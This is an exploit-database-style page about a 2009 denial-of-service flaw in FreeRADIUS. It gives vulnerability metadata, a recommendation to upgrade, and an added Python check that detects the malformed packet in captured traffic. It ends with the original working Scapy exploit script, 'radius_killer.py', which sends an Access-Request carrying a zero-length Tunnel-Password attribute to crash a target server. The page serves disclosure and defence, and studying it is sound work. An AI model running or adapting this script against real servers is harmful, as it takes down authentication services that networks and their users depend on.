Vendor: FreeRADIUS
By: Matthew Gillespie
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: FreeRADIUS
Patch Exists: YES
Year: 2009

FreeRadius Packet Of Death

This exploit is a denial-of-service attack against FreeRADIUS servers. It requires the RadiusAttr library for Scapy. The exploit sends a malformed packet to the FreeRADIUS server, causing it to crash.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of FreeRADIUS.
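
The exploit code further down this page sends an Access-Request (code 1) whose only attribute is type 69 (Tunnel-Password) with length 2, that is, an empty value. As an added example (not part of the original page or of FreeRADIUS), this Python 3 check parses a captured UDP payload and flags that shape along with structurally invalid attribute lengths, which goes slightly beyond the single case on the page; the function name `inspect_radius` and both sample payloads are constructed for illustration.

```python
import struct

ACCESS_REQUEST = 1     # RADIUS packet code (RFC 2865)
TUNNEL_PASSWORD = 69   # attribute type seen in the packet on this page
HEADER_LEN = 20        # code(1) + id(1) + length(2) + authenticator(16)

def inspect_radius(payload):
    """Return a list of findings for one UDP payload sent to the auth port."""
    if len(payload) < HEADER_LEN:
        return ["truncated header"]
    code, _ident, length = struct.unpack("!BBH", payload[:4])
    if length < HEADER_LEN or length > len(payload):
        return ["bad length field"]
    findings = []
    pos = HEADER_LEN
    while pos < length:
        if pos + 2 > length:
            findings.append("truncated attribute header")
            break
        a_type, a_len = payload[pos], payload[pos + 1]
        # An attribute's length covers its own 2-byte header, so 2 is the minimum.
        if a_len < 2 or pos + a_len > length:
            findings.append(f"attribute {a_type}: invalid length {a_len}")
            break
        if code == ACCESS_REQUEST and a_type == TUNNEL_PASSWORD and a_len == 2:
            findings.append("zero-length Tunnel-Password in Access-Request")
        pos += a_len
    return findings

# Constructed sample: Access-Request carrying User-Name "alice".
BENIGN = bytes.fromhex("0101001b" + "00" * 16 + "0107616c696365")
# Constructed sample with the same shape as the packet in the page's code:
# code 1, id 180, one attribute of type 69 with length 2.
SUSPECT = bytes.fromhex("01b40016" + "99" * 16 + "4502")

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_radius(pkt) or "ok")
```

The same function can be run over payloads extracted from a packet capture of UDP port 1812 to see whether an unpatched server has received this packet.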

Exploit-DB raw data:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print "Usage: radius_killer.py <radiushost>\n"
	sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
	Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
	RadiusAttr(type=69,value="",len=2)

send(PoD)

# milw0rm.com [2009-09-11]